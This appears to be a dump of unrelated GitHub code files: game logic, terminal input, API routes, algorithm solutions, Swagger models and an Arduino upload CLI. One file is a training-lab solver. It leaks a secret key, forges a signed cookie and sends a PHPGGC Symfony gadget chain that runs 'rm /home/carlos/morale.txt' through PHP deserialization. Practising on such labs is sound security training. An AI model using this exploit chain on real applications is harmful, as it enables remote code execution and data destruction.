players, players_colors, cards_per_player, win_strike)\n\n        while not self.step(): pass\n\n        return self.seq.winner\n\n\nclass SequenceView:\n    def __init__(self, seq):\n        self.seq = seq\n\n    @property\n    def colors(self):\n        return super().__getattribute__(\"seq\").colors[:]\n\n    @property\n    def pile(self):\n        return super().__getattribute__(\"seq\").discard_pile[:]\n\n    @property\n    def board(self):\n        return super().__getattribute__(\"seq\").board\n\n    @property\n    def 
count(self):\n        return super().__getattribute__(\"seq\").count\n\n    @property\n    def score(self):\n        return super().__getattribute__(\"seq\").score.copy()\n\n    @property\n    def size(self):\n        return super().__getattribute__(\"seq\").board_size\n\n    @property\n    def strike(self):\n        return super().__getattribute__(\"seq\").win_strike\n\n    @property\n    def discard(self):\n        return super().__getattribute__(\"seq\").can_discard\n\n    @property\n    def player(self):\n        return super().__getattribute__(\"seq\").current_player\n\n    @property\n    def cards(self):\n        return super().__getattribute__(\"seq\").cards_per_player\n\n    @property\n    def players(self):\n        return super().__getattribute__(\"seq\").number_of_players\n\n    def __getattribute__(self, name: str):\n        if name == \"seq\":\n            raise AttributeError(\"SequenceView doesn't have a `seq` attribute\")\n        return super().__getattribute__(name)\n","repo_name":"AlexBeovides/cooperAItive","sub_path":"src/games/sequence/module/sequence.py","file_name":"sequence.py","file_ext":"py","file_size_in_byte":11648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"13409589409","text":"import asyncio\nimport time\n\nimport terminedia\nfrom terminedia.events import QuitLoop, Subscription, KeyPress\nfrom terminedia.screen import Screen\nfrom terminedia.input import KeyCodes\nfrom terminedia.utils import contextkwords\n\n\nasync def terminedia_main(screen=None, context=None):\n    \"\"\"Terminedia mainloop - Framework support for interactive applications and animations\n\n    Usage:\n        ...\n        import asyncio\n        from terminedia import terminedia_main\n\n        ## setup screen, elements and event callback functions\n        screen = terminedia.Screen()\n        ...\n\n        asyncio.run(terminedia_main(screen))\n        #EOF\n\n    Any code can dispatch an events.QuitLoop event to exit the\n    automatic mainloop update.\n\n    (history: up to now (4/2021) anyone developing with terminedia\n    was supposed to code their own loop, and call screen.update()\n    on each frame)\n    \"\"\"\n\n    if screen is None:\n        screen = Screen()\n    if context is None:\n        from terminedia import context\n\n    break_loop = Subscription(QuitLoop)\n    context.screen = screen\n\n    screen.accelerate()\n\n    with terminedia.keyboard, terminedia.mouse, screen:\n        while not break_loop:\n\n            frame_start = time.time()\n            await asyncio.sleep(0)\n            screen.update()\n            frame_wait = max(0, (1 / context.fps) - (time.time() - frame_start))\n            await asyncio.sleep(frame_wait)\n\n\ndef _refresh_line(text, pos, max_pos, backspace=0):\n    delete_back = '\\b' * backspace\n    text = ''.join(text)\n    clear = \" \" * ((max_pos - pos) - len(text) + backspace)\n    move_back = (len(text) + len(clear)) * \"\\b\"\n    terminedia.print(delete_back, text, clear, move_back, sep=\"\", end=\"\", flush=True)\n\n\n@contextkwords\nasync def ainput(prompt=\"\", maxwidth=None, insert=True):\n    result = []\n    if prompt:\n        terminedia.print(prompt, end=\"\", flush=True)\n    with terminedia.keyboard:\n        keyboard_events = Subscription(KeyPress)\n        max_pos = pos = 0\n        async for event in keyboard_events:\n            print_code = key = event.key\n            if key == KeyCodes.ENTER:\n                keyboard_events.kill()\n            allow_print = True\n            if key:\n                if key == KeyCodes.RIGHT:\n                    if pos < len(result) and (maxwidth is None or pos < maxwidth - 1):\n                        pos += 1\n                    else:\n                        allow_print = False\n                elif key == KeyCodes.LEFT:\n                    if pos > 0:\n                        pos -= 1\n                    else:\n                        allow_print = False\n                elif key == KeyCodes.DELETE:\n                    if len(result) > pos:\n                        del result[pos]\n                    _refresh_line(result[pos:], pos, max_pos)\n                    allow_print = False\n                elif key == 
KeyCodes.BACK and pos > 0:\n                    pos -= 1\n                    del result[pos]\n                    _refresh_line(result[pos:], pos, max_pos + 2, backspace=1)\n                    allow_print = False\n                elif key in KeyCodes.codes:\n                    allow_print = False\n\n            allow_new_char = maxwidth is None or len(result) < maxwidth\n            if key not in KeyCodes.codes:\n                if allow_new_char and pos == len(result):\n                    result.append(key)\n                elif insert and allow_new_char: # (and pos <= len(result):)\n                    result.insert(pos, key)\n                    _refresh_line(result[pos:], pos + 1, max_pos)\n                elif not insert and pos < len(result):\n                    result[pos] = key\n                    pos += 1\n                else:\n                    allow_print = False\n                if allow_new_char:\n                    pos += 1\n\n            if allow_print:\n                terminedia.print(print_code, end=\"\", flush=True)\n                max_pos = max(max_pos, pos)\n\n\n    return ''.join(result)\n","repo_name":"jsbueno/terminedia","sub_path":"terminedia/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":3960,"program_lang":"python","lang":"en","doc_type":"code","stars":98,"dataset":"github-code","pt":"53"} +{"seq_id":"27052177270","text":"from types import SimpleNamespace\n\n\n_routes = {\n    'project': {\n        '_base': 'projects/',\n        'create': '',\n        'info': ':uuid/',\n        'deploy': ':uuid/deploy/',\n        'attach': ':uuid/attach/',\n        'detach': ':uuid/detach/'\n    },\n    'model': {\n        '_base': 'models/',\n        'predict': ':uuid/predict/',\n        'register': 'register/'\n    },\n    'runs': {\n        '_base': 'runs/',\n        'create': '',\n        'get': ':uuid/'\n    },\n    'job': {\n        '_base': 'jobs/:uuid/',\n        'state': '',\n        'cancel': 'delete/'\n    },\n    'data': {\n        '_base': 'data/',\n        'list': '',\n        'get': ':uuid/',\n        'preprocess': ':uuid/preprocess/',\n        'state': ':uuid/state/',\n        'info': ':uuid/',\n        'sample': ':uuid/sample/',\n        'cancel': ':uuid/cancel/'\n    },\n    'query': {\n        '_base': 'queries/',\n        'list': '',\n        'info': ':uuid/',\n        'cancel': ':uuid/cancel/',\n        'create': ''\n    },\n    'artifacts': {\n        '_base': 'artifacts/',\n        'download': 'download'\n    }\n}\n\n\ndef _build_routes():\n    \"\"\"Helper function to build namespaced routes\"\"\"\n    r = {}\n    for route, subroutes in _routes.items():\n        s = {}\n        for path, value in subroutes.items():\n            if path != '_base':\n                s[path] = '{}{}'.format(_routes[route]['_base'], value)\n        r[route] = SimpleNamespace(**s)\n    return r\n\n\nroutes = SimpleNamespace(**_build_routes())\n","repo_name":"gradientzero/dq0-sdk","sub_path":"dq0/sdk/cli/api/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"36882567071","text":"# -*- coding: utf-8 -*-\nimport speedtest\nimport subprocess\nimport platform\nfrom multiprocessing.dummy import Pool as ThreadPool\nimport csv\n\ndef server():\n    '''Get the speedtest.net servers (7k servers)'''\n    ser_all = []\n    s = speedtest.Speedtest()\n    for i in s.get_servers().values():\n        for srv in i:\n            srv['host'] = srv['host'][:-5]\n            ser_all.append(srv)\n    return ser_all\n\ndef ping(host):\n    '''Ping a host, using the Windows or Unix ping command'''\n    try:\n        ping_str = \"-n 1\" if platform.system().lower() == \"windows\" else \"-c 1\"\n        args = \"ping \" + \" \" + ping_str + \" \" + host\n        con_out = subprocess.check_output(args, shell=True).decode('cp866')\n        con_out = (con_out.split( '=' )[2])[:-6]\n    except:\n        con_out = 0\n    return con_out\n\ndef split(arr, count):\n    '''Split the list from server() into count interleaved chunks for the thread pool'''\n    return [arr[i::count] for i in range(count)]\n\npool = ThreadPool(5)\n\nfor part in (split(server(), 1700)):\n    try:\n        hosts_part = [i['host'] for i in part]\n        ttl_all = 
pool.map(ping, hosts_part)\n        cnt = len(ttl_all)\n    except:\n        z=0\n\n    '''save result to csv file'''\n    with open( 'ping.csv', 'a') as f:\n        for num, i in enumerate(part):\n            i['ttl'] = ttl_all[num]\n\n            lat=str(i['lat'])\n            lon=str(i['lon'])\n            name=str(i['name'])\n            country=str(i['country'])\n            id=str(i['id'])\n            hostst=str(i['host'])\n            ttlst=str(i['ttl'])\n            d=str(i['d'])\n            stroka = id + ';' + name + ';' + country + ';' + lat + ';' + lon + ';' + hostst + ';' + d + ';' + ttlst\n            print (stroka)\n\n            try:\n                f.write(str(stroka) +'\\n')\n            except:\n                z=0\n    f.close()\nprint ('ok')\n","repo_name":"tarbagan/global_ping","sub_path":"global_ping.py","file_name":"global_ping.py","file_ext":"py","file_size_in_byte":1817,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71888458409","text":"from collections import deque\n\ntarget = list(input())\ntarget2 = ''\nfor i in range(len(target)):\n    target2 += target[i]\n    target[i] = int(target[i])\n\nanswer = abs(100-int(target2))\narr2 = []\nn = int(input())\nif n > 0 :\n    arr = list(map(int,input().split()))\n    for i in range(10):\n        if i not in arr:\n            arr2.append(str(i))\n\nif target2 == '100':\n    print(0)\nelif n == 0:\n    print(min(len(target),answer))\nelif n == 10:\n    print(abs(100-int(target2)))\nelse:\n    stack = list()\n    for i in arr2:\n        stack.append(i)\n    l = len(target2)\n    while stack:\n        cn = stack.pop()\n        answer = min(answer,len(cn)+abs(int(cn)-int(target2)))\n        for i in arr2:\n            nn = cn + str(i)\n            if len(nn) < l+2:\n                stack.append(nn)\n\n    print(answer)\n","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/10월/1016/1sol.py","file_name":"1sol.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2071067353","text":"\n\nimport collections\n\n#standard O(n^2) time O(n^2) space solution, 1800ms\nclass Solution(object):\n    def longestPalindromeSubseq(self, s):\n        \"\"\"\n        :type s: str\n        :rtype: int\n        \"\"\"\n        #dp [i,j]:= LPS in s[i:j+1]\n        \n        #first check if it's palindrome string\n        if s[::-1]==s: return len(s) #critical to pass OJ\n        \n        #standard DP using dict \n        dp = collections.defaultdict(int)\n        for i in range(len(s)):\n            dp[i,i] = 1\n        for i in range(len(s)-1):\n            dp[i,i+1] = 2 if s[i]==s[i+1] else 1\n        \n        for gap in range(2,len(s)):\n            for i in range(len(s) - gap):\n                j = i + gap\n                if s[i]==s[j]:\n                    dp[i, j] = 2 + dp[i+1,j-1]\n                else:\n                    dp[i, j] = max(dp[i,j-1], dp[i+1, j])\n        \n        return dp[0,len(s)-1]\n        \n","repo_name":"mcfair/Algo","sub_path":"516_Longest_Palindrome_Subsquence.py","file_name":"516_Longest_Palindrome_Subsquence.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8811069421","text":"# Exploiting PHP deserialization with a pre-built gadget chain\n\nimport os\nimport sys\nimport requests\nimport urllib3\nimport urllib.parse\nimport re\nimport time\nimport warnings\nimport base64\n\nwarnings.filterwarnings(\"ignore\", category=DeprecationWarning)\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\nproxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}\n\n#\t\tPAYLOAD GENERATED WITH PHPGGC:\n#\t\thttps://github.com/ambionics/phpggc\n#\n#\t\t$> phpggc Symfony/RCE4 exec 'rm /home/carlos/morale.txt' 2>/dev/null | base64 -w 0\n\nPHPGGC_PAYLOAD = 
\"Tzo0NzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxUYWdBd2FyZUFkYXB0ZXIiOjI6e3M6NTc6IgBTeW1mb255XENvbXBvbmVudFxDYWNoZVxBZGFwdGVyXFRhZ0F3YXJlQWRhcHRlcgBkZWZlcnJlZCI7YToxOntpOjA7TzozMzoiU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQ2FjaGVJdGVtIjoyOntzOjExOiIAKgBwb29sSGFzaCI7aToxO3M6MTI6IgAqAGlubmVySXRlbSI7czoyNjoicm0gL2hvbWUvY2FybG9zL21vcmFsZS50eHQiO319czo1MzoiAFN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcVGFnQXdhcmVBZGFwdGVyAHBvb2wiO086NDQ6IlN5bWZvbnlcQ29tcG9uZW50XENhY2hlXEFkYXB0ZXJcUHJveHlBZGFwdGVyIjoyOntzOjU0OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAcG9vbEhhc2giO2k6MTtzOjU4OiIAU3ltZm9ueVxDb21wb25lbnRcQ2FjaGVcQWRhcHRlclxQcm94eUFkYXB0ZXIAc2V0SW5uZXJJdGVtIjtzOjQ6ImV4ZWMiO319Cg==\"\n\n##########################################################\n#\tFUNCTIONS\n##########################################################\n\ndef connect_as_wiener(s, url):\n\tlogin_path = url + '/login'\n\ttime.sleep(1)\n\tdata_login = {'username': 'wiener', 'password': 'peter'}\n\tprint('\\n[+] Sending connection to the application as Wiener...')\n\tr = s.post(login_path, data=data_login)\n\ttime.sleep(1)\n\tif 'Your username is: wiener' in r.text:\n\t\treturn r\n\telse:\n\t\tprint('[-] Exploit failed to connect as Wiener ')\n\t\tsys.exit(1)\n\ndef get_cookies(s):\n\tsession = s.cookies['session']\n\tdecoded_session = urllib.parse.unquote(session)\n\tprint('\\n[+] Found Session Cookie:\\t\\t%s' % decoded_session)\n\ttime.sleep(1)\n\tsig = re.search(r'\"sig_hmac_sha1\":\"(.*)\"}', decoded_session).group(1)\n\tprint('[+] Found sig_hmac_sha1:\\t\\t%s' % sig)\n\ttime.sleep(1)\n\ttoken = re.search(r'\"token\":\"(.*)\",\"sig', decoded_session).group(1)\n\tprint('\\n[+] Found Token:\\t\\t\\t%s' % token)\n\ttime.sleep(1)\n\tdecoded_token = base64.b64decode(token).decode()\n\tprint('[+] Decoded Token:\\t\\t\\t%s' % decoded_token)\n\ttime.sleep(1)\n\taccess_token = re.search('\"access_token\";s:32:\"(.*)\";', decoded_token).group(1)\n\tprint('[+] Found Access Token:\\t\\t\\t%s' % access_token)\n\ttime.sleep(1)\n\treturn access_token, sig\n\ndef sign_cookie(s, url, secret_key):\n\tprint('\\n[+] Trying to build a malicious cookie signed with the secret_key...\\n')\n\tphp_template = f\"\"\"\\\\$object = \\\\\"{PHPGGC_PAYLOAD}\\\\\"; \\\\$secretKey = \\\\\"{secret_key}\\\\\"; \\\\$cookie = urlencode('\\\\{{\\\\\"token\\\\\":\\\\\"' . \\\\$object . '\\\\\",\\\\\"sig_hmac_sha1\\\\\":\\\\\"' . hash_hmac('sha1', \\\\$object, \\\\$secretKey) . 
'\\\\\"\\\\}}'); echo \\\\$cookie;\"\"\"\n\tresp = os.popen(f'php -r \"{php_template}\"', 'r', 1)\n\tcookie = resp.readline().replace('%5C', '')\n\tprint(cookie)\n\treturn cookie\n\ndef get_secret_key(s, url):\n\tr = s.get(url)\n\tdebug_line = re.search(r'', r.text).group(1)\n\tprint('\\n[+] Found Comment on the main page:\\t%s' % debug_line)\n\tdebug_path = re.search(r'href=(.*)>Debug', debug_line).group(1)\n\tprint('[+] Following the debug link: \\t\\t%s' % debug_path)\n\tr = s.get(url + debug_path)\n\tsecret_key = re.search(r'SECRET_KEY (.*) ', r.text).group(1)\n\tprint('[+] Found Application Secret key:\\t%s' % secret_key)\n\treturn secret_key\n\ndef show_usage():\n\tprint('[+] Usage: %s ' % sys.argv[0])\n\tprint('[+] Example: %s https://www.target.com' % sys.argv[0])\n\tsys.exit(-1)\n\n##########################################################\n#\tMAIN\n##########################################################\n\ndef main():\n\tprint('[+] Lab: Exploiting PHP deserialization with a pre-built gadget chain')\n\ttry:\n\t\turl = sys.argv[1].strip()\n\texcept IndexError:\n\t\tshow_usage()\n\ts = requests.Session()\n\ts.proxies = proxies\t\t# Comment this line to disable proxying\n\ts.verify = False\n\ttry:\n\t\tr = s.get(url, allow_redirects=False)\n\t\ttime.sleep(1)\n\t\tif '

Error

' in r.text or 'Server Error: Gateway Timeout' in r.text:\n\t\t\tprint('\\n[-] HOST seems to be down ')\n\t\t\tsys.exit(-1)\n\t\telse:\n\t\t\tprint('[+] Trying to find a way to delete Carlos morale.txt file...\\n')\n\t\t\ttime.sleep(1)\n\t\t\tparsed_url = urllib.parse.urlparse(url)\n\t\t\thost = parsed_url.netloc\n\t\t\tif parsed_url.port:\n\t\t\t\tport = parsed_url.port\n\t\t\telif parsed_url.scheme == \"https\":\n\t\t\t\tport = 443\n\t\t\telif parsed_url.scheme == \"http\":\n\t\t\t\tport = 80\n\t\t\tprint(parsed_url)\n\t\t\turl = parsed_url.scheme + '://' + host\n\t\t\tprint('[+] Trying to send the payload generated by PHPGCC...')\n\t\t\tr = connect_as_wiener(s, url)\n\t\t\taccess_token, sig = get_cookies(s)\n\t\t\tsecret_key = get_secret_key(s, url)\n\t\t\tcookie = sign_cookie(s, url, secret_key)\n\t\t\ts.cookies.clear()\n\t\t\tcookies= {'session': cookie}\n\t\t\tprint('[+] Sending the request...')\n\t\t\tr = s.get(url, cookies=cookies)\n\t\t\tif r.status_code == 500:\n\t\t\t\tprint('[+] Request sent results to an internal error !')\n\t\t\ttime.sleep(2)\n\t\t\ts.cookies.clear()\n\t\t\ttime.sleep(2)\n\t\t\tr = s.get(url)\n\t\t\tif 'Congratulations, you solved the lab!' in r.text:\n\t\t\t\tprint('\\n[+] The lab is solved !')\n\texcept requests.exceptions.ProxyError:\n\t\tprint('[-] PROXY seems to be missconfigured ')\n\texcept KeyboardInterrupt:\n\t\tsys.exit(0)\n\nif __name__ == \"__main__\":\n\tmain()\n","repo_name":"gwyomarch/WebSecurityAcademy","sub_path":"InsecureDeserialization/exploit-lab06.py","file_name":"exploit-lab06.py","file_ext":"py","file_size_in_byte":5415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16266748699","text":"from flask import Blueprint, render_template, redirect\n\nfrom random import randrange\n\n\nhogwarts_blueprint = Blueprint('hogwarts', __name__, url_prefix='')\n\n\n@hogwarts_blueprint.route('/')\ndef hogwargs_index():\n if not randrange(100):\n return redirect('https://www.youtube.com/watch?v=dQw4w9WgXcQ')\n return render_template('hogwarts.html')\n","repo_name":"alixryu/getpost","sub_path":"getpost/desk/hogwarts.py","file_name":"hogwarts.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1104176379","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.account_identifier import AccountIdentifier # noqa: F401,E501\nfrom swagger_server.models.currency import Currency # noqa: F401,E501\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass AccountBalanceRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, account_identifier: AccountIdentifier=None, block_identifier: PartialBlockIdentifier=None, currencies: List[Currency]=None): # noqa: E501\n \"\"\"AccountBalanceRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this AccountBalanceRequest. 
# noqa: E501\n :type network_identifier: NetworkIdentifier\n :param account_identifier: The account_identifier of this AccountBalanceRequest. # noqa: E501\n :type account_identifier: AccountIdentifier\n :param block_identifier: The block_identifier of this AccountBalanceRequest. # noqa: E501\n :type block_identifier: PartialBlockIdentifier\n :param currencies: The currencies of this AccountBalanceRequest. # noqa: E501\n :type currencies: List[Currency]\n \"\"\"\n self.swagger_types = {\n 'network_identifier': NetworkIdentifier,\n 'account_identifier': AccountIdentifier,\n 'block_identifier': PartialBlockIdentifier,\n 'currencies': List[Currency]\n }\n\n self.attribute_map = {\n 'network_identifier': 'network_identifier',\n 'account_identifier': 'account_identifier',\n 'block_identifier': 'block_identifier',\n 'currencies': 'currencies'\n }\n self._network_identifier = network_identifier\n self._account_identifier = account_identifier\n self._block_identifier = block_identifier\n self._currencies = currencies\n\n @classmethod\n def from_dict(cls, dikt) -> 'AccountBalanceRequest':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The AccountBalanceRequest of this AccountBalanceRequest. # noqa: E501\n :rtype: AccountBalanceRequest\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def network_identifier(self) -> NetworkIdentifier:\n \"\"\"Gets the network_identifier of this AccountBalanceRequest.\n\n\n :return: The network_identifier of this AccountBalanceRequest.\n :rtype: NetworkIdentifier\n \"\"\"\n return self._network_identifier\n\n @network_identifier.setter\n def network_identifier(self, network_identifier: NetworkIdentifier):\n \"\"\"Sets the network_identifier of this AccountBalanceRequest.\n\n\n :param network_identifier: The network_identifier of this AccountBalanceRequest.\n :type network_identifier: NetworkIdentifier\n \"\"\"\n if network_identifier is None:\n raise ValueError(\"Invalid value for `network_identifier`, must not be `None`\") # noqa: E501\n\n self._network_identifier = network_identifier\n\n @property\n def account_identifier(self) -> AccountIdentifier:\n \"\"\"Gets the account_identifier of this AccountBalanceRequest.\n\n\n :return: The account_identifier of this AccountBalanceRequest.\n :rtype: AccountIdentifier\n \"\"\"\n return self._account_identifier\n\n @account_identifier.setter\n def account_identifier(self, account_identifier: AccountIdentifier):\n \"\"\"Sets the account_identifier of this AccountBalanceRequest.\n\n\n :param account_identifier: The account_identifier of this AccountBalanceRequest.\n :type account_identifier: AccountIdentifier\n \"\"\"\n if account_identifier is None:\n raise ValueError(\"Invalid value for `account_identifier`, must not be `None`\") # noqa: E501\n\n self._account_identifier = account_identifier\n\n @property\n def block_identifier(self) -> PartialBlockIdentifier:\n \"\"\"Gets the block_identifier of this AccountBalanceRequest.\n\n\n :return: The block_identifier of this AccountBalanceRequest.\n :rtype: PartialBlockIdentifier\n \"\"\"\n return self._block_identifier\n\n @block_identifier.setter\n def block_identifier(self, block_identifier: PartialBlockIdentifier):\n \"\"\"Sets the block_identifier of this AccountBalanceRequest.\n\n\n :param block_identifier: The block_identifier of this AccountBalanceRequest.\n :type block_identifier: PartialBlockIdentifier\n \"\"\"\n\n self._block_identifier = block_identifier\n\n @property\n def currencies(self) -> List[Currency]:\n 
\"\"\"Gets the currencies of this AccountBalanceRequest.\n\n In some cases, the caller may not want to retrieve all available balances for an AccountIdentifier. If the currencies field is populated, only balances for the specified currencies will be returned. If not populated, all available balances will be returned. # noqa: E501\n\n :return: The currencies of this AccountBalanceRequest.\n :rtype: List[Currency]\n \"\"\"\n return self._currencies\n\n @currencies.setter\n def currencies(self, currencies: List[Currency]):\n \"\"\"Sets the currencies of this AccountBalanceRequest.\n\n In some cases, the caller may not want to retrieve all available balances for an AccountIdentifier. If the currencies field is populated, only balances for the specified currencies will be returned. If not populated, all available balances will be returned. # noqa: E501\n\n :param currencies: The currencies of this AccountBalanceRequest.\n :type currencies: List[Currency]\n \"\"\"\n\n self._currencies = currencies\n","repo_name":"xanimo/rosetta-api","sub_path":"server/python-flask-server-generated/swagger_server/models/account_balance_request.py","file_name":"account_balance_request.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73131161127","text":"import sys\nfrom pathlib import Path\nfrom tempfile import gettempdir\nfrom subprocess import run, CalledProcessError\nimport click\nimport inodaqv2\n\nPATH_SRC = Path(inodaqv2.__file__).parent\nBUILD_DIR = Path(gettempdir()) / \"inodaq-v2-build\"\nCACHE_DIR = Path(gettempdir()) / \"inodaq-v2-core-cache\"\n\n\ndef compile_source(port: str, fqbn: str) -> None:\n cmd = [\n \"arduino-cli\",\n \"compile\",\n \"--verbose\",\n f\"--port={port}\",\n f\"--fqbn={fqbn}\",\n f\"--build-path={BUILD_DIR}\",\n f\"--build-cache-path={CACHE_DIR}\",\n \"ino\",\n ]\n\n try:\n run(cmd, check=True, cwd=PATH_SRC)\n except CalledProcessError as e:\n sys.exit(f\"Compilation failed with code {e.returncode}\")\n\n\ndef upload_source(port: str, fqbn: str) -> None:\n cmd = [\n \"arduino-cli\",\n \"upload\",\n \"--verbose\",\n f\"--port={port}\",\n f\"--fqbn={fqbn}\",\n f\"--input-dir={BUILD_DIR}\",\n \"ino\",\n ]\n\n try:\n run(cmd, check=True, cwd=PATH_SRC)\n except CalledProcessError as e:\n sys.exit(f\"Upload failed with code {e.returncode}\")\n\n\n@click.command()\n@click.option(\"--serial-port\", default=\"COM3\", help=\"Specify serial port\")\n@click.option(\n \"--fqbn\", default=\"arduino:avr:uno\", help=\"Specify fully qualified board name\"\n)\ndef main(serial_port: str, fqbn: str) -> None:\n compile_source(serial_port, fqbn)\n upload_source(serial_port, fqbn)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"dsw7/InoDAQV2","sub_path":"inodaqv2/upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17871013698","text":"from django.core.management.base import BaseCommand, CommandError\nfrom ipn.repo.message.test import test\n\nclass Command(BaseCommand):\n help = \"helps me test things\"\n def add_arguments(self, parser):\n parser.add_argument('mid', nargs='*', type=int, help='message id')\n\n def handle(self, *args, **kwargs):\n print(kwargs)\n try:\n test()\n except Exception as e:\n print(\"ERROR\")\n 
print(e)\n","repo_name":"lpsinger/interplanetary_network","sub_path":"ipn/management/commands/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28843580122","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'Hervé Beraud'\n__email__ = 'herveberaud.pro@gmail.com'\n__version__ = '0.3.0'\n\nimport argparse\nimport sys\nimport click\nfrom discosub.commands.discover import analyze\n\n\n@click.group()\ndef main():\n \"\"\"Fast BruteForce Subdomain Discover\"\"\"\n pass\n\n\n@main.command()\n@click.argument('target')\n@click.option('--agressive', '-a', is_flag=True, help=\"Use agressive scanning mode (disabled by default)\")\ndef run(agressive, **kwargs):\n '''Run a subdomain scanner on specified TARGET'''\n analyze(kwargs['target'], agressive)\n\n\n@main.command()\ndef version():\n \"\"\"Display Discosub Version\"\"\"\n print('discosub {version}'.format(version=__version__),)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"4383/discosub","sub_path":"discosub/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"5163623165","text":"# -*- coding: utf-8 -*-\n# @Time : 2022/7/20 16:10\n# @Author : Tuffy\n# @Description :\nfrom typing import Dict, Tuple, Type\n\nfrom construct import Computed, Construct, Rebuild, Struct\nfrom pydantic.fields import FieldInfo\nfrom pydantic.main import BaseModel, ModelMetaclass\n\n__all__ = (\n \"SignallingBaseModel\",\n)\n\n\nclass SignallingModelMetaclass(ModelMetaclass):\n def __new__(mcs, name: str, bases: Tuple[Type, ...], attrs: dict, **kwargs):\n cls = super().__new__(mcs, name, bases, attrs, **kwargs)\n if name != \"SignallingBaseModel\":\n\n parent_subcons_ = {}\n for parent_ in bases:\n parent_subcons_ |= getattr(parent_, \"_subcons_kwargs\", {})\n\n subcons_kwargs_ = parent_subcons_ | mcs.query_construct_field(attrs)\n\n struct_type_ = attrs.get(\"_signalling_struct\", getattr(cls, \"_signalling_struct_type\", Struct))\n setattr(cls, \"_signalling_struct\", struct_type_(**subcons_kwargs_))\n setattr(cls, \"_signalling_struct_type\", struct_type_)\n\n setattr(cls, \"_subcons_kwargs\", subcons_kwargs_)\n return cls\n\n @staticmethod\n def query_construct_field(attrs: Dict[str, FieldInfo]) -> Dict[str, Construct]:\n subcons_kwargs_ = {}\n for attr_name_, field_ in attrs.items():\n if isinstance(field_, FieldInfo) and \"signalling_struct\" in field_.extra:\n if \"struct_padding\" in field_.extra:\n subcons_kwargs_[f\"_{attr_name_}_padding\"] = field_.extra[\"struct_padding\"]\n if \"compute_rebuild\" in field_.extra:\n subcons_kwargs_[f\"_{attr_name_}\"] = Rebuild(\n field_.extra[\"signalling_struct\"], field_.extra[\"compute_rebuild\"].rebuild\n )\n subcons_kwargs_[attr_name_] = Computed(field_.extra[\"compute_rebuild\"].computed)\n else:\n subcons_kwargs_[attr_name_] = field_.extra[\"signalling_struct\"]\n return subcons_kwargs_\n\n\nclass SignallingBaseModel(BaseModel, metaclass=SignallingModelMetaclass):\n _signalling_struct: Construct = Struct\n _signalling_struct_type: Construct = Struct\n\n @classmethod\n def signalling_parse(cls, data: bytes):\n dict_ = cls._signalling_struct.parse(data)\n return cls.parse_obj(dict_)\n\n @classmethod\n def signalling_build(cls, obj: Dict) -> bytes:\n return cls._signalling_struct.build(obj)\n\n def to_signalling(self) -> bytes:\n return 
